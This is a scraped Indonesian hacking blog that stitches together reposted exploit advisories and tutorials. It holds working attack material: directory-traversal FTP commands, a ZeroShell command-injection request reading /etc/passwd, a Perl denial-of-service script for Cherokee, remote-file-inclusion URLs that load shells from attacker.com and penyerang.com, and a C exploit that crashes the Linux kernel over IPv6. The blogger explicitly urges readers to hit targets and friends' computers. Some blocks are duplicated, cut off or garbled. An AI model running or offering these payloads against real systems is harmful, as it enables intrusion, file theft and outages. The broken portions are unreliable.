Sunday, October 25, 2009

Telnet-Ftp Service Server v1.x

Multiple Vulnerability:
-Remote Creat File
-Remote Delet File
-Remote Creat Directory
-Remote Delet Directory
-Remote Get File
-Remote Crash

--------------------------------------------------------------------------------------------------------
Arbitrary:
----------
A vulnerability is caused due to an input validation error when handling FTP "DELE","RETR","MKD","RMD"
requests. This can be exploited to escape the FTP root and delete arbitrary files, get arbitrary files,
creat arbitrary directory, or delete arbitrary directory on the system via directory traversal
attacks using the "../" character sequence.

Remote Crash:
-------------
The vulnerability is caused due to an error in handling the RETR command. This can be exploited to crash
the FTP service by sending the "RETR" command without sending the "PORT" command.
--------------------------------------------------------------------------------------------------------

You can delet file boot.ini => DELE ../../boot.ini
You can get file boot.ini => RETR ../../boot.ini
You can creat Directory => MKD ../../poc
You can delet Directory => RMD ../../WINDOWS
You can crash service => (RETR 0)x2

Author: Jonathan Salwan
Mail : submit [AT] shell-storm.org
Web : http://www.shell-storm.org
*/

#include "stdio.h"
#include "unistd.h"
#include "stdlib.h"
#include "sys/types.h"
#include "sys/socket.h"
#include "netinet/in.h"

int syntax(char *file)
{
fprintf(stderr,"\nTelnet-Ftp Service Server v1.x Multiple Vulnerability\n");
fprintf(stderr,"-----------------------------------------------------\n");
fprintf(stderr,"=>Syntax : <%s>

Telnet-Ftp Service Server v1.x

Multiple Vulnerability:
-Remote Creat File
-Remote Delet File
-Remote Creat Directory
-Remote Delet Directory
-Remote Get File
-Remote Crash

--------------------------------------------------------------------------------------------------------
Arbitrary:
----------
A vulnerability is caused due to an input validation error when handling FTP "DELE","RETR","MKD","RMD"
requests. This can be exploited to escape the FTP root and delete arbitrary files, get arbitrary files,
creat arbitrary directory, or delete arbitrary directory on the system via directory traversal
attacks using the "../" character sequence.

Remote Crash:
-------------
The vulnerability is caused due to an error in handling the RETR command. This can be exploited to crash
the FTP service by sending the "RETR" command without sending the "PORT" command.
--------------------------------------------------------------------------------------------------------

You can delet file boot.ini => DELE ../../boot.ini
You can get file boot.ini => RETR ../../boot.ini
You can creat Directory => MKD ../../poc
You can delet Directory => RMD ../../WINDOWS
You can crash service => (RETR 0)x2

Author: Jonathan Salwan
Mail : submit [AT] shell-storm.org
Web : http://www.shell-storm.org
*/

#include "stdio.h"
#include "unistd.h"
#include "stdlib.h"
#include "sys/types.h"
#include "sys/socket.h"
#include "netinet/in.h"

int syntax(char *file)
{
fprintf(stderr,"\nTelnet-Ftp Service Server v1.x Multiple Vulnerability\n");
fprintf(stderr,"-----------------------------------------------------\n");
fprintf(stderr,"=>Syntax : <%s>

Free Photo Gallery Site Script (path) File Disclosure Vulnerability

This summary is not available. Please click here to view the post.

Free Photo Gallery Site Script (path) File Disclosure Vulnerability

# Script  : gallery-script-lite
# Bug : Remote Local File Inclusion Vulnerability
# Download : http://www.arwscripts.com/gallery-script-lite.html
# Dork : developed by ARWScripts.com
# file : download.html
# Error :

=========================JIkI Team===================
# Exploit :

http://[site]/[script]/download.html?path=
#ex :
download.html?path=config.inc.php
http://www.xxx.com/demos/galleryscriptlite/download.html?path=config.inc.php

Source : by JiKo

Nokia Browser Array Sort Denial Of Service Vulnerability

====================================================
Security Research Advisory

Vulnerability name: Nokia Browser Array Sort Denial Of Service Vulnerability

====================================================
1) Affected Software

* Nokia Mini Map Browser (S60WebKit <= 21772)

The tested device has the following User-Agent:
Mozilla/5.0 (SymbianOS/9.2;U;Series60/3.1 NokiaE90-1/210.34.75
Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML)
Safari/413

Note: Although the Nokia Web Browser is built upon a port of the
open source WebKit used by Apple for its browser, the iPhone is not
affected (at least the iPhone firmware version 2.0.2(5C1))

====================================================
2) Severity

Severity: Low
Local/Remote: Remote

====================================================
3) Summary

The Web Browser for S60 (formally called Nokia Mini Map Browser) is a web
browser for the S60 mobile phone platform developed by Nokia.
It is built upon S60WebKit, a port of the open source WebKit project to the S60
platform. According to several sources, the S60 software on Symbian OS is the
world’s most popular software for smartphones.

This version of the Nokia Mini Map Browser does not properly validate JavaScript
input embedded in visited HTML pages. An aggressor can easily trigger Denial of
Service attacks.

References:
http://opensource.nokia.com/projects/S60browser/
http://en.wikipedia.org/wiki/Web_Browser_for_S60

====================================================
4) Vulnerability Details

The Nokia Mini Map Browser is prone to a vulnerability that may result in the
application silent crash. Arbitrary code execution is probably not possible.
The problem arises in the JavaScript core of the S60WebKit, invoking the sort()
function on a recursive array.
A similar behavior was observed some years ago in several browsers due to
the common code base (BID-12331, BID-11762, BID-11760, BID-11759,
BID-11752).

====================================================
5) Exploit

Embed in an HTML page the following JavaScript:


====================================================
6) Fix Information

n/a

====================================================
7) Time Table

08/09/2008 - Vendor notified.
15/09/2008 - Vendor response.
??/??/???? - Vendor patch release.
10/10/2008 - Public disclosure.

====================================================
8) Credits

Discovered by Luca Carettoni - luca.carettoni[at]ikkisoft[dot]com

====================================================
9) Legal Notices

The information in the advisory is believed to be accurate at the time of
publishing based on currently available information.
This information is provided as-is, as a free service to the community.
There are no warranties with regard to this information.
The author does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
Permission is hereby granted for the redistribution of this alert, provided
that the content is not altered in any way, except reformatting, and that due
credit is given.

This vulnerability has been disclosed in accordance with the RFP
Full-Disclosure Policy v2.0, available at:
http://www.wiretrip.net/rfp/policy.html

====================================================

Source : milw0rm.com [2008-10-10]

ZeroShell <= 1.0beta11 Remote Code Execution

ZeroShell (http://www.zeroshell.net/eng/) is a small Linux distribution
for servers and embedded devices. This Linux distro can be configured
and managed with an easy to use web console.

ZeroShell is prone to an arbitrary code execution vulnerability due to
an improper input validation mechanism. An aggressor may abuse this
weakness in order to compromise the entire system.
Authentication is not required in order to exploit this flaw.

[Proof of Concept]

/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;;%22

In addition to the Unix commands, it is possible to abuse the
ZeroShell scripts themself. For instance it is likely to use the
"getkey" script in order to retrieve remote files, including the content
in the html page.

{HTTP REQUEST}
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host:

source :
http://www.ikkisoft.com

FUSE BUILDER Multiple Vulnerabilities

FUSE BUILDER Vulnerabilities namely :

> Html Injection
> XSS

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Exploitation :

[+] Html Injection

http://HOST/index.php?fa=PAGE.[HTML Injection Vector]

[+] XSS

http://HOST/index.php?fa=PAGE.[XSS Vector]


Author : Usman Saeed , Xc0re Security Research Group.

Cherokee Web Server 0.5.4 Denial Of Service

Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]

[*] Download Page : http://www.cherokee-project.com/download/windows/

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Exploitation :


#!/usr/bin/perl
# Cherokee Web Server 0.5.4 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [25/10/09]

$host = $ARGV[0];
$PORT = $ARGV[1];

$packet = "AUX";

$stuff = "GET /".$packet." HTTP/1.1\r\n" .
"User-Agent:Bitch/1.0 (Windows NT 5.1; U; en)\r\n" .
"Host:$host\r\n".
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n".
"Accept-Language: en-US,en;q=0.9\r\n".
"Accept-Charset: iso-8859-1,*,utf-8\r\n".
"Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n\r\n";


use IO::Socket::INET;
if (! defined $ARGV[0])
{
print "+========================================================+\n";
print "+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n";
print "+ Author [Usman Saeed] +\n";
print "+ Company [Xc0re Security Research Group] +\n";
print "+ DATE: [25/10/09] +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport +\n";
print "+ Disclaimer: [This code is for Educational Purposes , +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";

exit;
}

$sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr => $host , PeerPort => $PORT) || die "Cant connect to $host!";
print "+========================================================+\n";
print "+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n";
print "+ Author [Usman Saeed] +\n";
print "+ Company [Xc0re Security Research Group] +\n";
print "+ DATE: [25/10/09] +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport +\n";
print "+ Disclaimer: [This code is for Educational Purposes , +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";


print "\n";
print "[*] Initializing\n";
sleep(2);
print "[*] Sendin DOS Packet \n";
send ($sock , $stuff , 0);
print "[*] Crashed :) \n";
$res = recv($sock,$response,1024,0);
print $response;

exit;

Author : Usman Saeed , Xc0re Security Research Group.

Multiple Remote File Include Vulnerability

#Download Script      :  http://sourceforge.net/projects/loggix/files/
#Author : cr4wl3r
#Contact : milw0rm.com
#Dork : No DoRk f0R ScRipT KiDDieS

#file :
# Calendar.php
# Comment.php
# Rss.php
# Trackback.php
# LM_Downloads.php
########################################################################
#Bugs :
# require_once $pathToIndex . '/lib/Loggix/Module.php';
########################################################################
#3xplo!t :
#http://target.com/[path]/lib/Loggix/Module/Calendar.php?pathToIndex=http://attacker.com/shell.txt???
#http://target.com/[path]/lib/Loggix/Module/Comment.php?pathToIndex=http://attacker.com/shell.txt???
#http://target.com/[path]/lib/Loggix/Module/Rss.php?pathToIndex=http://attacker.com/shell.txt???
#http://target.com/[path]/lib/Loggix/Module/Trackback.php?pathToIndex=http://attacker.com/shell.txt???
#http://target.com/[path]/modules/downloads/lib/LM_Downloads.php?pathToIndex=http://attacker.com/shell.txt???

Friday, October 23, 2009

SQL Injection Scanner

SQL Injection Scanner

Sedikit informasi buat yg mo nyoba metode sql injection, kebetulan gw dapet link bagus ney…

buat mempercepat langkah lo aja sey sebener’a, lo bisa download tools sql injection scanner berikut:

SQLier

SQLbftools

SQLNinja

Automagic SQL Injector

SQL Injection Brute-forcer

SQL Power Injection

SQL Injection Pen-testing Tool

mudah²an tools di atas berguna buat para admin yg sering merasa bahwa dengan memakai firewall, antivirus, IDS etc…system mereka sudah aman, padahal kenyataan’a ga sama sekali.

percuma di kasih firewall dan segala aplikasi pengaman tp klo coding’a semua default.


Source : Venom's blog

Hacker Filosofi

Filosofi adalah budaya berpikir, mencintai kebijaksanaan, mencari ilmu pengetahuan, bukankah itu sama seperti sedang melakukan akitivitas hacking? gw berpikiran seperti itu, well…pada dasar’a arah dan tujuan’a sama, oleh karena itu gw kira akan lebih baik untuk menghabiskan banyak waktu untuk belajar dan mengetahui aspek mental dari hacking itu sendiri, filosofi.

Filosofi mempunyai banyak aspek, tapi gw lebih suka memulai’a dari sebuah aspek yaitu konflik nyata antara para hacker dan non hacker : Etika. Apa yg baik, apa yg jahat. Kebaikan untuk banyak orang masuk ke dalam komputer dan mencuri informasi adalah sebuah kejahatan, merebut akses root di sebuah server adalah sebuah kejahatan, merubah tampilan website atau deface adalah sebuah kejahatan, begitukah??

Hal yg pertama gw pikirkan tentang semua itu, kita akan menyetujui dan membenarkan aksi yg dilakukan bagi kita sendiri, ga masalah mau seperti apapun, ga ada yg baik dan jahat, kita ambil contoh adalah sebuah kejahatan apabila membunuh seseorang karena lo suka membunuh, tapi lain cerita apabila lo membunuh seseorang karena dia mengancam lo dengan sebuah pistol. Adalah sebuah kejahatan apabila mencuri uang hanya karena untuk membeli jam baru, tapi ga seorangpun yg berpikir Robin Hood jahat ketika dia mencuri uang, setuju?

So, aksi yg dilakukan untuk diri’a sendiri adalah ga bisa di bilang baik dan ga bisa di bilang jahat juga, itu bisa di bilang sebuah motivasi, mari kita lihat motivasi para hacker dan apa motivasi kita? Gw ga berpikir kita dapat menyamaratakan beberapa komitmen tentang kriminal adalah rasa keingintahuan dengan segampang itu, beberapa orang di antara’a melakukan hacking karena mereka hanya ingin membuktikan, dan beberapa di antara’a melakukan kegiatan hacking hanya untuk membuat kekacauan.

Tapi apakah semua’a menjadi masalah? berpikir bahwa melakukan hacking adalah sebuah kejahatan hanya karena untuk mendapatkan ilmu pengetahuan? berpikir bahwa ga semua ilmu pengetahuan tersedia untuk setiap orang? berpikir bahwa hacking adalah makna kejahatan karena dilakukan hanya untuk pamer? After all, lo bisa melakukan aktivitas hacking, kenapa ga memperlihatkan’a pada dunia? apakah membeli perhiasan dan memakerkan itu bukanlah salah satu dari kejahatan, apakah seperti itu? Dan itu adalah kejahatan untuk membuat kekacauan? Internet adalah dunia kami, dan itu akan menjadi pilihan bagi kami dengan apa yg kami ingin lakukan, benar seperti itu?

Di lain pihak, apa kita yakin bahwa ilmu pengetahuan tersedia bagi setiap orang, hidup dapat berbahaya apabila semua informasi berasal dari public, dan memperlihatkan’a dengan kegiatan hacking akan dapat dipertimbangkan sebagai kejahatan juga, menggambar graffiti di sebuah tembok termasuk hal ilegal juga, dan tentu membuat kekacauan adalah sebuah kejahatan, sebuah dunia yg di dasari akan perintah.

Untuk terakhir, kegiatan hacking masih dapat di katakan baik dan buruk, biarkan gw mengulangi beberapa kalimat dari manifesto hacker:

————————————————————————————-

This is our world now…the world of electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn’t run by profiteering gluttons, and you call us criminals. We explore…and you call us criminals. We seek after knowledge…and you call us criminals. We exist without skin color, without nationality, without religious bias…and you call us criminals. you build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it’s for our own good, yet we’re the criminals

————————————————————————————-

kata² yg gamblang, khilaf? mari kita review, We make use of a service already existing without paying for what could be dirt-cheap if it wasn’t run by profiteering gluttons, yup, terdengar sangat jelas, apabila beberapa orang di dunia ini menolak untuk membayar line telepon mereka, untuk koneksi internet mereka, mereka akan terpuruk karena ga ada seorangpun yg dapat memperbaiki itu semua apabila ada kerusakan, bahkan sebuah layanan yg telah ada akan mereka bayar untuk menjaga’a agar tetap berjalan normal.

We explore…and you call us criminals. We seek after knowledge…and you call us criminals, terdengar ga adil, tersiksa untuk berpetualang, coba pikirkan dalam konteks: “apabila gw berpetualang dalam jaringan network sekolah, menemukan soal² ujian yg belum di berikan di sekolah, gw akan tau semua rencana² ujian sekolah.

Tapi coba lihat ini, you build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it’s for our own good, yet we’re the criminals”, ya…apa yg di katakan dalam kalimat itu benar, apa yg kita lakukan terhadap undang², apa yg kita lakukan perintah, terhadap opini yg mayoritas, tapi coba bandingkan dengan aksi² pemerintah, dengan otoritas mereka, idealisme kita sama dengan mereka, kita tau kenapa kita melakukan aktivitas hacking, dunia ini benar² sudah parah, semua orang benar² sakit, semua orang berteriak tentang keburukan kepada para hacker, kami mungkin jahat, tetapi kami ga sejahat dunia ini.

source : Nubilosus, the Mentor

DDoS dan DoS

Denial of Service (DoS)

Varian pertama serangan berupa pengiriman air bah data ke target itu adalah DoS (Denial of Service). Dalam serangan ini penyerang hanya menggunakan satu komputer untuk menyemburkan data ke korbannya.

Penjelasan sederhananya seperti ini: Suatu ketika handphone anda berbunyi. Sebelum anda sempat menggangkatnya handphone anda telah berhenti berbunyi. Tiba-tiba handphone anda berbunyi lagi dan tanpa sempat anda mengangkatnya, bunyi itupun segera berhenti. Beberapa kali anda biarkan tapi masalah ini tak kunjung selesai. Beberapa kolega anda yang hendak menghubungi anda terpaksa tidak bisa melakukannya karena handphone anda sibuk terus. Itulah gambaran sederhana serangan DoS di dunia non-cyber.

Di dunia cyber, kasus anda tersebut merupakan serangan salah satu jenis DOS (Denial of Service). Yang pasti, sebegitu mudahnya DOS ini diterapkan tapi mencegahnya bukanlah suatu hal yang gampang. Target-target serangan DOS biasanya adalah server-server ISP, Internet Banking, E-commerce, Web perusahaan, dan pemerintah.

Serangan DoS dapat dilakukan dengan mengirimkan query sebanyak mungkin hingga target tidak bisa lagi menanganinya sehingga target lumpuh. Cara lain melakukan serangan DoS adalah dengan mengirimkan data rusak atau data yang tidak mampu di tangani oleh server target sehingga server tersebut menjadi hang (tidak bisa berfungsi sebagaimana mestinya dan perlu di restart ulang).

DDOS (Distributed Denial of Service)

Mengirimkan data secara terus menerus dengan menggunakan satu komputer tidak begitu efektif karena biasanya sumber daya server yang diserang lebih besar dari komputer penyerang. Daya bunuh serangan juga akhirnya menjadi lemah.

Hacker penyerangpun memutar otaknya. Serangan dapat lebih mematikan jika tenaga banyak komputer dijadikan satu untuk menciptakan banjir data yang lebih besar.

Komputer-komputer yang diambil alih oleh hacker tersebut disebut zombie. Zombie berfungsi sebagai anak buah atau agent penyerang yang siap beraksi saat mendapat perintah dari “tuannya.”

Semakin banyak zombie yang dkuasai seorang penyerang, semakin berkuasalah sang hacker tersebut karena besarnya tenaga yang ia genggam. Dengan tenaga besar yang dikumpulkan dari komputer-komputer yang dikuasai (secara illegal tentunya) tersebut, serangan DDoS hampir tidak dapat ditangkal. Karena itulah serangan tipe ini sangat populer di kalangan hacker.

Beberapa situs raksasa seperti Amazon.com, eBay, dan Yahoo pada Februari 2000 rontok selama beberapa jam karena serbuan ini. Gedung Putih juga sempat boyongan karena serangan tipe ini. Gedung Putih terpaksa “memindahkan” IP address situsnya karena jengah menerima serangan DDoS yang sudah dirancang untuk muncul pada tanggal dan jam tertentu dengan memanfaatkan virus tertentu tanpa mampu mencegahnya.

DDoS adalah tipe serangan dengan konsep sederhana. Namun efeknya bisa memindahkan “istana negara.”

Menghadapi Serangan DDOS

Serangan DDoS adalah serangan dengan teori sederhana namun dengan dampak yang sangat besar. Sayangnya, sampai saat ini belum ditemukan cara paling tepat untuk menghindari serangan ini secara total.

Meski sampai saat ini belum ada sistem yang kebal terhadap serangan ini, ada sejumlah langkah yang dapat dilakukan untuk memperkecil resiko serangan DDoS ini.

Karena serangan DDoS dapat dilakukan dengan memanfaatkan kelemahan operating system yang anda gunakan, jangan pernah lupa mengupdate patch untuk memerbaiki sistem pengoperasian anda. Ingatlah bahwa tidak ada satupun sistem operasi di dunia ini yang aman dan 100 persen bebas dari kelemahan.

Gunakan hardware/server yang kuat. Server tersebut harus mampu menangani beban yang cukup berat sehingga server anda tidak mudah down. Anda bisa mendesain network yang saling membackup dan akan lebih bagus jika berada pada beberapa daerah sekaligus.

Gunakan firewall untuk mengeblok port-port (pintu masuk) yang tidak di perlukan di server-server anda.

Gunakan IDS (Intrusion Detection System) untuk mendeteksi penyusup dan melakukan pencegahan yang lebih cerdik.

Terminologi dan Tools Pada DDoS

Terminologi-terminologi yang umum dalam serangan DDoS antara lain adalah Client – sebuah aplikasi yang digunakan untuk memicu serangan dengan mengirimkan perintah ke komponen-komponen lain, Daemon – sebuah proses dalam menjalankan agent yang bertanggung jawab menerima dan melaksanakan perintah yang dikeluarkan client, Master – host yang menjalankan client, Agent – host yang menjalankan Daemon, dan Target – korban (berupa host atau jaringan) yang dihantam serangan DDoS. Alur serangan DDoS adalah:

Penyerang (Master) -> Client -> Daemon -> Korban (Target)

Tools

Program-program yang dapat digunakan hacker untuk melancarkan serangan DDoS semakin mudah didapatkan dari Internet. Karenanya semakin berbahaya pula ancaman ini dengan semakin banyaknya orang yang dapat melakukannya.

Beberapa tool paling terkenal yang sering digunakan untuk melancarkan serangan DDoS adalah TFN2K, Trinoo dan Stacheldraht

TFN2K

TFN2K (Tribe Flood Network 2000) adalah tool untuk melancarkan serangan DDoS. TFN2K adalah turunan Trojan TFN.

TFN2K memungkinkan master mengeksploitasi sejumlah agent untuk mengkoordinasikan serangan pada satu atau beberapa target yang diincar. Saat ini, Unix, Solaris, dan Windows NT adalah platform-platform yang rentan terhadap serangan ini.

TFN2K adalah sistem dengan dua komponen. Yang pertama adalah client yang dikomando oleh master dan sebuah proses daemon yang beroperasi pada sebuah agent. Master menginstruksikan para agent yang telah ditaklukkannya untuk menyerang target yang telah ditentukan. Para agent tersebut kemudian merespon dengan membanjirkan serbuan paket data. Sejumlah agent, dengan perintah Master, dapat bekerjasama selama serangan ini untuk mematahkan akses target. Komunikasi master-to-agent telah dienkripsi dan bercampur dengan paket-paket yang diluncurkan. Baik komunikasi master-to-agent maupun serangan itu sendiri dapat dikirimkan melalui paket-paket TCP, UDP, dan ICMP yang telah diacak. Master juga dapat melakukan pemalsuan IP address (spoofing). Hal ini membuat penagkalan TFN2K sangat sukar dilakukan.

Trinoo

Trinoo (a.k.a. trin00) adalah program slave/master terkenal yang digunakan dalam serangan DDoS. Daemon Trinoo awalnya ditemukan pada format binary sejumlah sistem Solaris 2.x, yang diidentifikasi dapat dimanfaatkan dengan mengeksploitasi bug buffer overrun.

Jaringan Trinoo dapat berupa ratusan bahkan ribuan sistem di Internet yang diambilalih dengan eksploitasi buffer overrun secara remote. Akses ke sistem-sistem yang dijadikan agent tersebut didapatkan dengan menanamkan program back door sekaligus daemon Trinoo.

Sebuah jaringan Trinoo yang paling tidak terdiri atas 227 sistem – 114 diantaranya merupakan situs-situs Internet – yang pada 17 Agustus 1999 digunakan untuk membanjiri satu sistem yang ada di University of Minnessota. Akibatnya, server malang itu ambruk dan koma selama dua hari. Saat penanganan terhadap serangan 17 Agustus itu dilakukan, banjir besar data juga diketahui sedang menyerang paling tidak 16 sistem lain, yang sebagian terdapat di luar AS.

Stacheldraht

Stacheldraht (Bahasa Jerman yang artinya adalah kawat berduri) adalah tool lain yang populer untuk melancarkan serangan DDoS.

Tool ini sangat unik karena ia menggabungkan fitur-fitur yang dimiliki oleh Trinoo dan TFN generasi pertama. Tool ini juga mempunyai enkripsi komunikasi antara penyerang dan master-master Stacheldraht serta mampu melakukan update agent secara otomatis.

Seperti Trinoo, Stacheldraht terdiri atas program-program master (handler) dan daemon atau bcast (agent). Fitur TFN yang dimiliki Stacheldraht adalah gaya-gaya serangan ICMP flood, SYN flood, UDP flood, dan “Smurf.”

Sumber: http://forum.webgaul.com/

Linux Kernel 2.6.20 – 2.6.21.1 Exploit

Yang mungkin pusing nyari exploit buat kernel 2.6.20 and 2.6.21.1 di google trus ga ketemu² artikel’a, sapa tau postingan gw yg ini bisa membantu anda² yg sedang dapet target inject gicuhhhh, o iya exploit ini di tulis dengan bahasa C, jadi dari sekarang mulai siapin target’a or coba buka lagi catatan beberapa target dari textpad’a, hehehe

yg maen dari localhost juga coba maenkan lah gcc’a, sapa tau komputer kawan anda yg pake OS linux dengan kernel yg bersangkutan sama postingan gw ini bisa di… you know lah apa mksd gw, hahaha !!

/* io */
#include
#include
#include

/* network */
#include
#include
#include
#include
#include
#include

#define MY_FRAME_LEN 1145

char *resolve6(unsigned char *target) {
char *ret_addr;
struct in6_addr my_in6;
char *glob_addr = (char *) &my_in6;
struct addrinfo addr_hints, *addr_result;
unsigned char out[64];

memset(&addr_hints, 0, sizeof(addr_hints));
addr_hints.ai_family = AF_INET6;

if (getaddrinfo(target, NULL, &addr_hints, &addr_result) != 0) {
printf(”getaddrinfo() error\n”);
exit(1);
}
if(getnameinfo(addr_result->ai_addr, addr_result->ai_addrlen, out, sizeof(out), NULL, 0, NI_NUMERICHOST) != 0){
printf(”getnameinfo() error\n”);
exit(1);
}
if(inet_pton(AF_INET6, out, glob_addr) < 0) {
printf(”inet_pton() error\n”);
exit(1);
}
if((ret_addr = malloc(16)) == NULL) {
printf(”malloc() error\n”);
exit(1);
}
memcpy(ret_addr, my_in6.s6_addr, 16);
return ret_addr;
}

int main(int argc, char *argv[]) {

if (argc < 4) {
printf(”usage: ./ipv6_jumbo_crash \n”);
exit(1);
}

/* handle IPv6 destination */
unsigned char *dest_ip = resolve6(argv[1]);

/* handle MAC */
unsigned char dest_mac[7];
sscanf(argv[2], “%x:%x:%x:%x:%x:%x”,
(unsigned int*)&dest_mac[0], (unsigned int*)&dest_mac[1],
(unsigned int*)&dest_mac[2], (unsigned int*)&dest_mac[3],
(unsigned int*)&dest_mac[4], (unsigned int*)&dest_mac[5]);

/* handle interface */
unsigned char *iface;
iface = argv[3];

/* buffer for ethernet frame */
void *buffer = (void*)malloc(MY_FRAME_LEN);

/* pointer to ethenet header */
unsigned char *etherhead = buffer;
struct ethhdr *eh = (struct ethhdr *)etherhead;

/* our MAC address */
unsigned char src_mac[6] = { 0×00, 0×11, 0×22, 0×33, 0×44, 0×55 };
unsigned char src_ip[16] = { 0xfe, 0×80, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×02};

/* prepare socket */
int s;
s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0) {
printf(”cannot create socket: [%d]\n”,s);
exit(1);
}

/* RAW communication */
struct sockaddr_ll socket_address;
socket_address.sll_family = PF_PACKET;
socket_address.sll_protocol = htons(ETH_P_IP);
socket_address.sll_ifindex = if_nametoindex(iface);
socket_address.sll_hatype = ARPHRD_ETHER;
socket_address.sll_pkttype = PACKET_OTHERHOST;
socket_address.sll_halen = ETH_ALEN;

/* set the frame header */
memcpy((void*)buffer, (void*)dest_mac, ETH_ALEN);
memcpy((void*)(buffer+ETH_ALEN), (void*)src_mac, ETH_ALEN);
eh->h_proto = 0xdd86; // IPv6

/* the buffer we want to send */
unsigned char bad_buffer[] = {
0×60, 0×3b, 0×50, 0×15, 0×04, 0×08, 0×00, 0xa0, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×43, 0×6e, 0xc2, 0×05, 0×23 };

memcpy((void*)(buffer+14), (void*)bad_buffer, MY_FRAME_LEN);

/* overwrite our src and dst ip */
memcpy((void*)(buffer+22), (void*)src_ip, 16);
memcpy((void*)(buffer+38), dest_ip, 16);

/* send the buffer */
int send_result = 0;
send_result = sendto(s, buffer, MY_FRAME_LEN, 0, (struct sockaddr*)&socket_address, sizeof(socket_address));
if (send_result == -1) {
printf(”could not send frame: [%d]\n”, send_result);
exit(1);
}
else printf(”frame send to ip [%s] with mac [%s] on iface [%s]\n”,argv[1],argv[2],argv[3]);

return 0;
}

Remote File Inclusion Vulnerability

Apa yg dimaksud RFI ?

Remote file inclusion dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.

Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi, berikut adalah contoh sederhana dari kesalahan coding yg memungkinkan terjadi’a RFI vuln :

http://www.target.com/index.php?page=blog.php
http://www.target.com/index.php?page=contact.php
http://www.target.com/index.php?page=gallery.php

coba kita lihat code pada index.php

$page = $_GET['page'];
include($page);
?>

pada baris ke 2, $page di konfigurasi menuju pada $_GET['page']
ini arti’a ketika kita menuju http://www.target.com/index.php?page=blog.php
$page mengekskusi file blog.php

apa yg terjadi? seperti yg gw bilang bahwa fungsi include akan mengeksekusi remote file, dengan catatan file tidak harus dalam satu server yg sama

coba kita ubah “blog.php” ke “http://www.google.com”
http://www.target.com/index.php?page=http://www.google.com
lo akan melihat homepage google menggantikan page blog.php

Apa inti’a dari ini semua ?

kita dapat mengeksekusi menggunakan evil scripts, atau mungkin yg lo pernah denger dengan apa yg di sebut “shell” (r57,c99,g00nshell,peanut,morgan)

script² yg terdapat pada evil script ini mempunyai fungsi melihat directory pada server yg telah terserang, menghapus file, melihat file, membiarkan lo menjalankan perintah² pada sistem.

Bagaimana cara menggunakan evil script ?

http://www.target.com/index.php?page=http://www.penyerang.com/r57.txt?

kita harus menggunakan shell dalam bentuk format .txt, .jpg, .pdf, karena apabila kita menggunakan .php maka script hanya akan mengeksekusi http://www.penyerang.com,

tanda tanya “?” pada akhir url adalah menyatakan akhir dari statement, atau dengan kata lain bahwa r57.txt adalah url terakhir, dan apabila di belakang r57.txt ada url tambahan maka akan di abaikan atau tidak di eksekusi. (ingat kita sedang membicarakan RFI bug)

Apakah berbahaya ?

File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelaku’a untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelaku’a mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.

Sistem operasi apa yg kebal terhadap RFI ?

“NO SYSTEMS IS SAFE!”
Tidak ada sistem operasi yang aman dari serangan injeksi selama mereka menggunakan server side scripting yang dapat dieksploitasi, tak peduli apakah itu Microsoft Windows, LINUX, FreeBSD, Solaris, Darwin OS, dan lain²a.

Pencegahan

1. Periksa kesalahan coding file include apabila lo menggunakan 3rd party pada sebuah cms

2. setting chmod lo agar file lo tidak dapat di tulis ulang dan di eksekusi oleh orang dengan account di bawah owner

3. setting safe mode menjadi on

4. jangan pernah malas untuk melihat log

5. buat selalu backup dari situs lo <- cara terakhir/pasrah

Buffer Overflow

Buffer Overflow ?

